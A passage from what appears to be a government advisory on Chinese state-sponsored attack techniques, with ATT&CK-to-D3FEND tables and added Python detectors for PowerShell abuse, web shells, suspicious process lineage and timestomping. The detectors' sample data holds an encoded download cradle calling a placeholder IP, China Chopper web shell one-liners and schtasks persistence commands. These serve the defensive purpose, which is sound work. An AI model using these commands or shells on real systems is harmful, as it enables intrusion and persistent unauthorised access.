Analysis 
[[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks by using legitimate but compromised credentials against Outlook Web Access (OWA) servers, corporate login portals, and other victim-network entry points.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups, and restrict those accounts to only the systems they manage.\n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). 
\n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and 
discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a Unix shell to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging (module logging, script block logging, and transcription). (**Note:** these features are only fully available in newer versions of PowerShell; NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Forward PowerShell logs to a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands, such as encoded commands, download cradles, and hidden windows. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell where possible, or block it with application control, if it is not necessary for operations. \n\n * Restrict which commands can be used (for example, with Constrained Language Mode or Just Enough Administration [JEA]).\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system but are enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. 
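The PowerShell logging and monitoring recommendations above, as an added Python example that is not the advisory's own code: a SIEM-style rule that scores process-creation command lines, decodes any `-EncodedCommand` payload (the same Base64 encoding of command strings noted under Obfuscated Files or Information later in this advisory) and scans the decoded text as well. The indicator patterns, hostnames, command lines and the alert threshold are constructed assumptions to be tuned per environment; the encoder helper exists only to build the sample input.

```python
import base64
import re

# Indicators a SIEM rule would look for in PowerShell command lines and
# script block text (PowerShell Operational event 4104). Patterns are matched
# case-insensitively against the command line plus any decoded payload.
SUSPICIOUS = {
    r"\biex\b|invoke-expression": "invoke-expression",
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest": "download cradle",
    r"frombase64string": "inline base64 decode",
    r"-w(indowstyle)?\s+hidden": "hidden window",
    r"-ex(ecutionpolicy)?\s+bypass|-ep\s+bypass": "execution policy bypass",
    r"-nop(rofile)?\b": "no profile",
    r"invoke-mimikatz|sekurlsa|lsass": "credential theft tooling",
    r"add-mppreference|set-mppreference": "defender tampering",
    r"reflection\.assembly|::load\(": "in-memory assembly load",
}

# -EncodedCommand is accepted as -e, -ec, -en, -enc or the full name; the
# payload is base64 of UTF-16LE text. Other abbreviations are left out so
# that -ea (ErrorAction) and -ep (ExecutionPolicy) do not match.
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(host, cmdline):
    """Score one process-creation record; the decoded payload is scanned too."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = {"encoded command"} if decoded is not None else set()
    low = text.lower()
    for pattern, label in SUSPICIOUS.items():
        if re.search(pattern, low):
            hits.add(label)
    return {"host": host, "score": len(hits), "hits": sorted(hits), "decoded": decoded}


def alerts(events, threshold=2):
    """Records whose score reaches the threshold; a lone -NoProfile is not enough."""
    return [r for r in (triage(h, c) for h, c in events) if r["score"] >= threshold]


def encode_command(script):
    """Build the -EncodedCommand form; used here only to construct sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [  # constructed (host, command line) pairs, not from the advisory
    ("admin-ws01", r"powershell.exe -NoProfile -File C:\Scripts\patch-report.ps1"),
    ("hr-ws17", "powershell.exe -nop -w hidden -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')")),
    ("srv-web02", 'powershell.exe -ep bypass -c "[Reflection.Assembly]::Load('
                  "[Convert]::FromBase64String('TVqQAAMAAAAEAAAA'))\""),
]

if __name__ == "__main__":
    for r in alerts(SAMPLE_EVENTS):
        print(r["host"], r["score"], r["hits"])
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

Scoring rather than single-pattern matching keeps an administrator's `-NoProfile -File` invocation below the threshold while the encoded download cradle and the in-memory assembly load are raised; decoding the payload first matters because none of the cradle's tokens are visible in the raw command line.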
\n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served through ads, ad blockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to control which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) system to limit the actions administrators can perform and to provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, web shells, or command-line tools, such as `schtasks` or `crontab`, to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation 
[[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Monitor scheduled task creation from common utilities using command-line invocation and compare it against known software, patch cycles, or other administrative activity; investigate any creation that does not correlate with them. \n * Configure event logging for scheduled task creation (Security event ID 4698, which requires the Audit Other Object Access Events subcategory, and event ID 106 in the Microsoft-Windows-TaskScheduler/Operational log) and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (older versions of Windows) to look for changes in `%systemroot%\\System32\\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally, monitor for any scheduled tasks created via command-line utilities, such as PowerShell or Windows Management Instrumentation (WMI), that do not conform to typical administrator or user actions. \n\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)] \n * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]\n * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]\n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nUser Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]\n\n * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]\n * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. 
These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\n| \n\n * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.\n * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * Use a domain reputation service to detect and block suspicious or malicious domains.\n * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.\n| \n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Network Traffic Analysis \n * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting 
[[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]\n\n_Table V: Chinese state-sponsored cyber actors\u2019 Persistence TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nHijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]: \n\n * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]\n| \n\nChinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. \n\n**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Disallow loading of remote DLLs.\n * Enable safe DLL search mode.\n * Implement tools for detecting search order hijacking opportunities.\n * Use application allowlisting to block unknown DLLs.\n * Monitor the file system for created, moved, and renamed DLLs.\n * Monitor for changes in system DLLs not associated with updates or patches.\n * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable 
Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nModify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]\n\n * Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]\n| \n\nChinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. \nNote: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].\n\n| \n\n * Monitor for policy changes to authentication mechanisms used by the domain controller. \n * Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).\n * Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. \n * Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). \n * Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n * Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. 
Monitor for and correlate changes to Registry entries.\n| \n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]\n * User Behavior Analysis \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]\n * User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)] \n \nServer Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]: \n\n * Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. \n\n| \n\n * Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.\n * Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.\n * Perform integrity checks on critical servers to identify and investigate unexpected changes.\n * Have application developers sign their code using digital signatures to verify their identity.\n * Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.\n * Implement a least-privilege policy on web servers to reduce adversaries\u2019 ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.\n * If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.\n * Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. 
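The web shell recommendations above (searching hosts for the predictable China Chopper syntax, and D3FEND's Process Lineage Analysis), together with the scheduled-task and service-creation monitoring recommended earlier in these tables, as an added Python example that is not from the advisory. Process records are in the shape Sysmon event 1 or auditd execve records provide (host, pid, ppid, image, command line); the process lists, the file contents, the web-server and shell name sets are constructed for the example, and the China Chopper patterns reflect the widely published one-line PHP, ASPX and ASP client stubs.

```python
import re
from collections import defaultdict

# Process names treated as web-server parents and as shells (assumption:
# extend per environment).
WEB_SERVERS = {"w3wp.exe", "httpd", "nginx", "php-fpm", "tomcat9.exe", "java"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "dash"}
# Persistence utilities and the verb that makes a call interesting (None = any use).
PERSISTENCE = {"schtasks.exe": "/create", "sc.exe": " create ", "crontab": None}

# Content rules for the one-line China Chopper server stubs.
WEBSHELL_RULES = {
    "china chopper php": re.compile(r"@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[", re.I),
    "china chopper aspx": re.compile(r'eval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*"unsafe"', re.I),
    "china chopper asp": re.compile(r"<%\s*eval\s*\(?\s*request\s*\(", re.I),
}


def scan_content(text):
    """Names of web shell rules that match a server-side file's content."""
    return [name for name, rx in WEBSHELL_RULES.items() if rx.search(text)]


def lineage(by_pid, pid):
    """Image names from a process up to the oldest ancestor we have a record for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # guard against pid-reuse loops
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Alerts for shells under web servers and for persistence commands, with lineage."""
    by_host = defaultdict(dict)
    for ev in events:
        by_host[ev["host"]][ev["pid"]] = ev
    alerts = []
    for host, by_pid in by_host.items():
        for ev in by_pid.values():
            chain = lineage(by_pid, ev["pid"])
            web = next((a for a in chain[1:] if a in WEB_SERVERS), None)
            trail = " <- ".join(chain)
            if ev["image"] in SHELLS and web:
                alerts.append((host, "high", f"{web} spawned {ev['image']}", trail))
            if ev["image"] in PERSISTENCE:
                verb = PERSISTENCE[ev["image"]]
                if verb is None or verb in ev["cmdline"].lower():
                    label = f"{ev['image']} persistence command"
                    alerts.append((host, "high" if web else "review", label, trail))
    return alerts


SAMPLE_EVENTS = [  # constructed process-creation records, not from the advisory
    {"host": "srv-web02", "pid": 1200, "ppid": 4, "image": "services.exe", "cmdline": "services.exe"},
    {"host": "srv-web02", "pid": 2048, "ppid": 1200, "image": "w3wp.exe", "cmdline": "w3wp.exe -ap DefaultAppPool"},
    {"host": "srv-web02", "pid": 3112, "ppid": 2048, "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"host": "srv-web02", "pid": 3120, "ppid": 3112, "image": "schtasks.exe",
     "cmdline": r"schtasks.exe /create /sc minute /mo 5 /tn Update /tr C:\Windows\Temp\u.exe"},
    {"host": "admin-ws01", "pid": 500, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"host": "admin-ws01", "pid": 640, "ppid": 500, "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"host": "admin-ws01", "pid": 660, "ppid": 640, "image": "schtasks.exe",
     "cmdline": "schtasks.exe /create /sc daily /tn Backup /tr backup.cmd"},
    {"host": "lin-app03", "pid": 900, "ppid": 1, "image": "httpd", "cmdline": "/usr/sbin/httpd -DFOREGROUND"},
    {"host": "lin-app03", "pid": 915, "ppid": 900, "image": "sh", "cmdline": "sh -c id"},
]

SAMPLE_FILES = {  # constructed file contents as found in a web root
    "upload.php": '<?php @eval($_POST["pass"]); ?>',
    "default.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "old.asp": '<%eval request("pass")%>',
    "contact.php": '<?php echo htmlspecialchars($_POST["name"]); ?>',
}

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
    for name, body in SAMPLE_FILES.items():
        print(name, scan_content(body) or "clean")
```

The lineage is what separates the two `schtasks /create` calls: the one whose ancestry runs back to `w3wp.exe` is rated high, the administrator's from `explorer.exe` only gets a review entry. The content rules catch the stubs at rest; the process rules catch the same shell being used, which also covers encoded or renamed variants the signatures miss.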
Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.\n * Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.\n * Establish, and backup offline, a \u201cknown good\u201d version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.\n * Employ user input validation to restrict exploitation of vulnerabilities.\n * Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.\n * Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.\n| \n\nDetect: \n\n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]\n * Process Analysis \n * Process Spawn Analysis \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate:\n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nCreate or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:\n\n * Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.\n\n**Note: **this technique also applies to Privilege Escalation 
[[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n * Only allow authorized administrators to make service changes and modify service configurations. \n * Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.\n * Monitor WMI and PowerShell for service modifications.\n| Detect: \n\n * Process Analysis \n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \n### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]\n\n_Table VI: Chinese state-sponsored cyber actors\u2019 Privilege Escalation TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDomain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]\n\n * Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]\n\n| \n\nChinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.\n * Monitor directory service changes using Windows event logs to detect GPO modifications. 
Several events may be logged for such GPO modifications.\n * Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.\n| \n\nDetect:\n\n * Network Traffic Analysis \n * Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]\n * Platform Monitoring \n * Operating System Monitoring \n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)] \n \nProcess Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]: \n\n * Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]\n * Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.\n * Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)\n\n**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]. \n\n\n| \n\n * Use endpoint protection software to block process injection based on behavior of the injection process.\n * Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. 
Look for DLLs that are not recognized or not normally loaded into a process.\n * Monitor for suspicious sequences of Windows API calls such as `OpenProcess`, `VirtualAllocEx`, `WriteProcessMemory`, and `CreateRemoteThread`, and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.\n * To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only the users who actually need them; upgrade Windows to at least version 8.1 or 10; run the Local Security Authority Subsystem Service (LSASS) as a protected process light (`RunAsPPL`) on Windows 8.1 and higher; and harden the local security authority (LSA) to prevent code injection.\n| \n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]\n\n_Table VII: Chinese state-sponsored cyber actors’ Defense Evasion TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nDeobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.\n\n| \n\n * Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.\n * Consider blocking, disabling, or monitoring use of 7-Zip.\n| \n\nDetect: \n\n * Process Analysis \n * Process 
Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nHide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]\n\n| \n\nChinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.\n\n| \n\n * Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.\n * Monitor event and authentication logs for records of hidden artifacts being used.\n * Monitor the file system and shell commands for hidden attribute usage.\n| \n\nDetect: \n\n * Process Analysis \n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n\nIsolate:\n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nIndicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands. \nSeveral files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.\n\n| \n\n * Make the environment variables associated with command history read only to ensure that the history is preserved.\n * Recognize timestomping by monitoring the contents of important directories and the attributes of the files. 
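The timestomping recommendations above (monitor the attributes of files in important directories; inconsistencies between timestamps can be a detection rule), as an added Python example that is not part of the advisory. On POSIX systems it relies on the inode change time (ctime), which cannot be set from user space, so an mtime rolled back by `touch -t` or a timestomping tool trails far behind ctime; a second signal is a whole-second mtime, since such tools usually write second-granularity values while real writes on ext4, xfs or tmpfs carry a sub-second part. On Windows `os.stat` reports the creation time in `st_ctime`, so the same comparison flags a file modified before it was created; NTFS `$FILE_NAME` timestamps, which timestomping tools typically leave untouched, are not exposed by `os.stat` and would need MFT parsing. The sample directory is constructed in a temporary folder and removed afterwards.

```python
import os
import shutil
import tempfile
import time


def inspect(path, now=None, slack=5.0):
    """Timestamp-consistency checks for one file; returns (verdict, reasons).

    The ctime gap alone also occurs after archive extraction, copying or chmod,
    so on its own it only earns a 'review'; combined with a whole-second mtime,
    or with an mtime in the future, the file is reported as likely timestomped.
    """
    st = os.stat(path)
    now = time.time() if now is None else now
    reasons = []
    if st.st_mtime_ns % 1_000_000_000 == 0:
        reasons.append("whole-second mtime")
    if st.st_ctime - st.st_mtime > slack:
        reasons.append("ctime later than mtime")
    if st.st_mtime > now + slack:
        reasons.append("mtime in the future")
    if "mtime in the future" in reasons or (
        "whole-second mtime" in reasons and "ctime later than mtime" in reasons
    ):
        return "likely timestomped", reasons
    if "ctime later than mtime" in reasons:
        return "review", reasons
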